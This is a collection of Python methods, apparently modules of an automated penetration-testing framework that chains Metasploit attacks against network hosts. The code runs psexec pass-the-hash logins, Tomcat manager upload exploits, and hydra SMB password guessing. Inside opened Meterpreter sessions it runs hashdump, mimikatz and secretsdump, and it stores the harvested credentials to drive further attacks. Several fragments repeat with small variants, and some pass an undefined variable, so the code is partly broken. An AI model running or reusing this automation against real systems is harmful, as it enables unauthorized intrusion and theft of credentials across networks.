def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # test for NULL authentication first if not self.seentarget(t): self.addseentarget(t) self.searchTarget(t, '', '', '') # test for any local users for user in self.getUsers(t): passwords = kb.get(['creds/host/' + t + '/username/' + user + '/password']) for password in passwords: if not self.seentarget(t + user + password): self.addseentarget(t + user + password) self.searchTarget(t, user, password, "") # test for any domain users domains = kb.get("host/" + t + "/domain") for domain in domains: for user in self.getDomainUsers(domain): passwords = kb.get(['creds/domain/' + t + '/username/' + user + '/password']) for password in passwords: if not self.seentarget(t + user + password + domain): self.addseentarget(t + user + password + domain) self.searchTarget(t, user, password, domain) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # test for NULL authentication first if not self.seentarget(t): self.addseentarget(t) self.searchTarget(t, '', '', '') # test for any local users for user in self.getUsers(t): passwords = kb.get( ['creds/host/' + t + '/username/' + user + '/password']) for password in passwords: if not self.seentarget(t + user + password): self.addseentarget(t + user + password) self.searchTarget(t, user, password, "") # test for any domain users domains = kb.get("host/" + t + "/domain") for domain in domains: for user in self.getDomainUsers(domain): passwords = kb.get([ 'creds/domain/' + t + '/username/' + user + '/password' ]) for password in passwords: if not self.seentarget(t + user + password + domain): self.addseentarget(t + user + password + domain) self.searchTarget(t, user, password, domain) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = kb.get(['host/' + t + '/user']) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) passwords = kb.get(['host/' + t + '/user/' + user + '/password']) for password in passwords: self.display.verbose(self.shortName + " - Connecting to " + t) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr( 10) # run secretesdump.py command = "secretsdump.py -outputfile " + temp_file + " \"" + user + "\":\"" + password + \ "\"@" + t result = Utils.execWait(command, None) # TODO # parse out put and store any new info and fire any additional triggers return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: users = kb.get("host/" + t + "/user") for user in users: hashes = kb.get("host/" + t + "/user/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t + user + passhash): # add the new IP to the already seen list self.addseentarget(t + user + passhash) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/psexec\n") # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n") # msf.execute("set LHOST %s\n" % self.config['lhost']) # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort())) # msf.execute("set LPORT 4444\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBUser " + user + "\n") msf.execute("set SMBPass " + passhash + "\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall( ".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("host/" + t + "/msfSession/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: users = kb.get("creds/service/tomcat/" + t + "/tcp/" + p + "/username") for user in users: passwords = kb.get("creds/service/tomcat/" + t + "/tcp/" + p + "/username/" + user + "/password") for password in passwords: # verify we have not tested this host before if not self.seentarget(t + p + user + password): # add the new IP to the already seen list self.addseentarget(t + p + user + password) cmd = { 'config': [ "use exploit/multi/http/tomcat_mgr_upload", "set RHOST %s" % t, "set RPORT %s" % p, "set HTTPUSERNAME %s" % user, "set HTTPPASSWORD %s" % password, "set fingerprintcheck false", "set target 2" ], 'payload': 'win' } result, outfile = self.msfExec(t, cmds) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln( t, self.shortName, { "port": p, "username": user, "password": password, "output": outfile.replace( "/", "%2F") }) if callFire: self.fire("msfSession") return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: users = kb.get("host/" + t + "/user") for user in users: hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t+user+passhash): # add the new IP to the already seen list self.addseentarget(t+user+passhash) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/psexec\n") # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n") # msf.execute("set LHOST %s\n" % self.config['lhost']) # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort())) # msf.execute("set LPORT 4444\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBUser " + user + "\n") msf.execute("set SMBPass " + passhash + "\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("host/" + t + "/msfSession/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = kb.get(['host/' + t + '/user']) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) passwords = kb.get( ['host/' + t + '/user/' + user + '/password']) for password in passwords: self.display.verbose(self.shortName + " - Connecting to " + t) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr( 10) # run secretesdump.py command = self.config["secretsdump.py"] + " -outputfile " + temp_file + " \"" + user + "\":\"" + password + \ "\"@" + t result = Utils.execWait(command, None) if Utils.isReadable(temp_file + '.sam'): with open(temp_file + '.sam', "r") as myfile: result = myfile.readlines() for line in result: m = line.split(':') user = m[0].strip() uid = m[1].strip() lmhash = m[2].strip() ntlmhash = m[3].strip() kb.add("host/" + t + "/user/" + user + "/lmhash/" + lmhash) kb.add("host/" + t + "/user/" + user + "/ntlmhash/" + ntlmhash) kb.add("host/" + t + "/user/" + user + "/fullhash/" + lmhash + ":" + ntlmhash) self.fire("newNTLMHash") return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: ports = kb.get([ 'service/https/host/' + t + '/tcpport', 'service/ssl/host/' + t + '/tcpport' ]) for port in ports: # verify we have not tested this host before if not self.seentarget(t + str(port)): # add the new IP to the already seen list self.addseentarget(t + str(port)) # make outfile temp_file = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + str( port) + "_" + Utils.getRandStr(10) command = "java -jar " + self.config[ "miscDir"] + "TestSSLServer.jar " + t + " " + port result = Utils.execWait(command, temp_file, timeout=30) # TODO - parse output and store results? # print result return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: ports = kb.get([ 'service/https/host/' + t + '/tcpport', 'service/ssl/host/' + t + '/tcpport' ]) for port in ports: # verify we have not tested this host before if not self.seentarget(t + str(port)): # add the new IP to the already seen list self.addseentarget(t + str(port)) # run nmap n = mynmap(self.config, self.display) scan_results = n.run( target=t, flags= "--script ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params," "ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed," "ssl-known-key,ssl-poodle,sslv2", ports=str(port), vector=self.vector, filetag=t + "_" + str(port) + "_SSLSCAN")['scan'] return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: cmd = { 'config': [ "use auxiliary/scanner/snmp/snmp_enumshares", "set RHOSTS %s" % t, "set COMMUNITY %s" % comString ], 'payload': 'none' } result, outfile = self.msfExec(t, cmds) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("share/smb/" + t + "/" + sharename) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: users = self.getUsers(t) for user in users: hashes = kb.get ("creds/host/" + t + "/username/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t+user+passhash): # add the new IP to the already seen list self.addseentarget(t+user+passhash) cmd = { 'config':[ "use exploit/windows/smb/psexec", "set RPORT 445", "set RHOST %s" % t, "set SMBUser %s" % user, "set SMBPass %s" % passhash ], 'payload':'win'} result, outfile = self.msfExec(t, cmds) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("shell/" + t + "/msf/" + str(part)) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: users = kb.get(['host/' + t + '/user']) self.display.verbose(self.shortName + " - Connecting to " + t) for user in users: # verify we have not tested this host before if not self.seentarget(t + str(user)): # add the new IP to the already seen list self.addseentarget(t + str(user)) # make outfile temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) command = "hydra -s 445 -l " + user + " -P " + self.config[ "miscDir"] + "passwords.txt smb://" + t result = Utils.execWait(command, temp_file, timeout=30) # Extract usernames & passwords from results and add to KB parts = re.findall(".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result) for part in parts: self.fire("newSmbPassword") self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")}) self.display.debug( "Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t) kb.add("host/" + t + "/user/" + part[0].strip() + "/password/" + part[1].strip()) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # loop over each target for t in self.targets: if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) cstrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for community in cstrings: command = self.config[ "snmpwalk"] + " -v 2c -c " + community + " " + t result = command + "\n" + Utils.execWait( command) #append command to top of output outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/vuln/snmpCred/output/" + outfile.replace("/", "%2F")) return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("getuid\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") outfile = self.config[ "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in text.splitlines(): m = re.match(r'^\s*Server username: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running as user [" + m.group(1).strip() + "]") msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("sysinfo\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") outfile = self.config[ "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in text.splitlines(): m = re.match(r'^\s*OS\s\s*: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running on OS [" + m.group(1).strip() + "]") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: myMsf.lock.acquire() msf.execute( "use auxiliary/scanner/snmp/snmp_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Extract usernames from results and add to KB parts = re.findall(".* users: .*", result) for part in parts: userlist = (part.split(':')[2]).split(',') for username in userlist: kb.add("creds/host/" + t + "/username/" + username.strip()) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("hashdump\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB # regex match on [^:]+:[^:]+:[^:]+:[^:]+::: outfile = self.config[ "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("load mimikatz\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("wdigest\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: # verify we have not tested this host before if not self.seentarget(t + p): # add the new IP to the already seen list self.addseentarget(t + p) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute( "use auxiliary/scanner/http/tomcat_mgr_login\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set RPORT %s\n" % p) msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in result.splitlines(): m = re.match(r'.*Successful: (.*):(.*)', line) if (m): self.display.error("Tomcat on [" + t + ":" + p + "] has default creds of [" + m.group(1).strip() + "]/[" + m.group(2).strip() + "]") kb.add("creds/service/tomcat/" + t + "/tcp/" + p + "/username/" + m.group(1).strip() + "/password/" + m.group(2).strip()) self.fire("newTomcatPassword") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('shell/' + t + '/msf') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) myMsf.lock.acquire() msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("hashdump\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") msf.sleep(int(self.config['msfexploitdelay'])) # TODO - process results and store results in KB # regex match on [^:]+:[^:]+:[^:]+:[^:]+::: outfile = self.config[ "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() myMsf.lock.release() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("load mimikatz\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("wdigest\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before ports = kb.get('service/http/' + t + '/tcp') for port in ports: if not self.seentarget(t + str(port)): self.addseentarget(t+str(port)) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr(10) + ".txt" command = "python " + self.config["jexboss"] + " -mode file-scan -out " + outfile + " -file <(echo \"http://" + t + ":" + str(port) + "\")" result = Utils.execWait(command) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" )) contents = [] with open (outfile, "r") as myfile: contents = myfile.readlines() for line in contents: m = re.match(r'^.*VULNERABLE TO (.*)\].*', line) if (m): vuln = m.group(1).strip() self.addVuln(t, self.shortName + "-" + vuln, {"port": port, "output": outfile.replace("/", "%2F")}) ports = kb.get('service/https/' + t + '/tcp') for port in ports: if not self.seentarget(t + str(port)): self.addseentarget(t+str(port)) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr(10) + ".txt" command = "python " + self.config["jexboss"] + " -mode file-scan -out " + outfile + " -file <(echo \"https://" + t + ":" + str(port) + "\")" result = Utils.execWait(command) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" )) contents = [] with open (outfile, "r") as myfile: contents = myfile.readlines() for line in contents: m = re.match(r'^.*VULNERABLE TO (.*)\].*', line) if (m): vuln = m.group(1).strip() self.addVuln(t, self.shortName + "-" + vuln, {"port": port, "output": outfile.replace("/", "%2F")}) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: ports = kb.get('service/ftp/' + t + '/tcp') for p in ports: self.testTarget(t, p) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: ports = kb.get('service/ftp/' + t + '/tcp') for p in ports: self.testTarget(t, p) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString") for comString in comStrings: msf.execute( "use auxiliary/scanner/snmp/snmp_enumshares\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("run\n") result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("host/" + t + "/share/smb/" + sharename) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('shell/' + t + '/msf') if len(sessions) > 0: # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) cmd = { 'config': [ "sessions -i %s" % str(s), "SLEEP", "getuid", "SLEEP", "background", "SLEEP" ], 'payload': 'none' } result, outfile = self.msfExec(t, cmds) for line in result.splitlines(): m = re.match(r'^\s*Server username: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running as user [" + m.group(1).strip() + "]") cmd = { 'config': [ "sessions -i %s" % str(s), "SLEEP", "sysinfo", "SLEEP", "background", "SLEEP" ], 'payload': 'none' } result, outfile = self.msfExec(t, cmds) for line in result.splitlines(): m = re.match(r'^\s*OS\s\s*: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running on OS [" + m.group(1).strip() + "]") return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.execute("getuid\n") msf.execute("background\n") # TODO - process results and store dat to KB outfile = self.config[ "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.execute("sysinfo\n") msf.execute("background\n") # TODO - process results and store dat to KB outfile = self.config[ "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before ports = kb.get(['service/http/host/' + t + '/tcpport', 'service/https/host/' + t + '/tcpport']) for port in ports: self.processTarget(t, port) for hostname in self.getHostnames(t): self.processTarget(hostname, port) return
def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before ports = kb.get('service/http' + t + '/tcp', 'service/https/' + t + '/tcp') for port in ports: self.processTarget(t, port) for hostname in self.getHostnames(t): self.processTarget(hostname, port) return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: myMsf.lock.acquire() msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("share/smb/" + t + "/" + sharename) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.execute("getuid\n") msf.execute("background\n") # TODO - process results and store dat to KB outfile = self.config[ "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.execute("sysinfo\n") msf.execute("background\n") # TODO - process results and store dat to KB outfile = self.config[ "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString") for comString in comStrings: msf.execute("use auxiliary/scanner/snmp/snmp_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("run\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Extract usernames from results and add to KB parts = re.findall(".* users: .*", result) for part in parts: userlist = (part.split(':')[2]).split(',') for username in userlist: kb.add("host/" + t + "/user/" + username.strip()) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: # verify we have not tested this host before if not self.seentarget(t+p): # add the new IP to the already seen list self.addseentarget(t+p) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/http/jboss_vulnscan\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set RPORT %s\n" % p) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" )) for line in result.splitlines(): m = re.match(r'.*Authenticated using (.*):(.*)', line) if (m): self.display.error("Jboss on [" + t + ":" + p + "] has default creds of [" + m.group(1).strip() +"]/[" + m.group(2).strip() + "]") kb.add("creds/service/jboss/" + t + "/port/" + p + "/username/" + m.group(1).strip() + "/password/" + m.group(2).strip()) self.fire("newJbossPassword") # clean up after ourselves result = msf.cleanup() return
